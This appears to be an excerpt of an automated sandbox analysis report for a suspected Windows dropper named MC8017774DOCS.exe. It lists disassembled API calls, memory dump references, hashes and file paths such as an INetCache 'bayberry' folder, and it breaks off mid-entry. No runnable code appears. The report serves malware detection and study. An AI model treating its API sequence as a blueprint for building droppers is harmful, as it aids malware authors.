                                                                                                                                                    • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                    • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                    • Opcode ID: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                                    • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
                                                                                                                                                    • Opcode Fuzzy Hash: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                                    • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                      • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                                      • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                                                                                      • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
• Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
• Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
• Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
APIs
• GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
• Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
• Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
• Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
APIs
• GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
• Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
• Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
• Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
• GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
• Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
• Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
• Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
APIs
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
• Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
• Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
• Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                    • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                    • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                    • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                    • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(6E9B405C,00000004,00000040,6E9B404C), ref: 6E9B29B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: f51089a927739ee14f809b9afe7efb43db5c52e4e5d1e1b89f963fa4639d743b
                                                                                                                                                    • Instruction ID: 6815c4b3cfd69bebb5255feb492b5917dcdc54d2a4cd20089854c40591412a88
                                                                                                                                                    • Opcode Fuzzy Hash: f51089a927739ee14f809b9afe7efb43db5c52e4e5d1e1b89f963fa4639d743b
                                                                                                                                                    • Instruction Fuzzy Hash: 33F092F1D1CA80DECB50CFA884847173BF0EF5A304B11452AE1A8DA240F374884AEF11
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                    • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                    • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                                                                                    APIs
                                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                                    • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                                                                                                    • Opcode Fuzzy Hash: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                                    • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• Sleep.KERNELBASE(00000000), ref: 004014EA
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
Memory Dump Source
• Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040549C
• GetDlgItem.USER32(?,000003EE), ref: 004054AB
• GetClientRect.USER32(?,?), ref: 004054E8
• GetSystemMetrics.USER32(00000002), ref: 004054EF
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
• ShowWindow.USER32(?,00000008), ref: 0040558B
• GetDlgItem.USER32(?,000003EC), ref: 004055AC
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
• GetDlgItem.USER32(?,000003F8), ref: 004054BA
  • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
• GetDlgItem.USER32(?,000003EC), ref: 004055FE
• CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
• CloseHandle.KERNEL32(00000000), ref: 00405613
• ShowWindow.USER32(00000000), ref: 00405637
• ShowWindow.USER32(?,00000008), ref: 0040563C
• ShowWindow.USER32(00000008), ref: 00405686
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
• CreatePopupMenu.USER32 ref: 004056CB
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
• GetWindowRect.USER32(?,?), ref: 004056FF
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
• OpenClipboard.USER32(00000000), ref: 00405760
• EmptyClipboard.USER32 ref: 00405766
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
• GlobalLock.KERNEL32(00000000), ref: 0040577C
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
• GlobalUnlock.KERNEL32(00000000), ref: 004057B0
• SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
• CloseClipboard.USER32 ref: 004057C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                                                                                    • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 00404866
                                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404872
                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                                                                                      • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                      • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                                                                                      • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                      • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                                                                                      • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$Call
• API String ID: 2624150263-2308116694
• Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
• Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
• Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
• Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
APIs
• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
Strings
• C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 004021C3
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
• API String ID: 542301482-3732074636
• Opcode ID: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
• Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
• Opcode Fuzzy Hash: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
• Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
Memory Dump Source
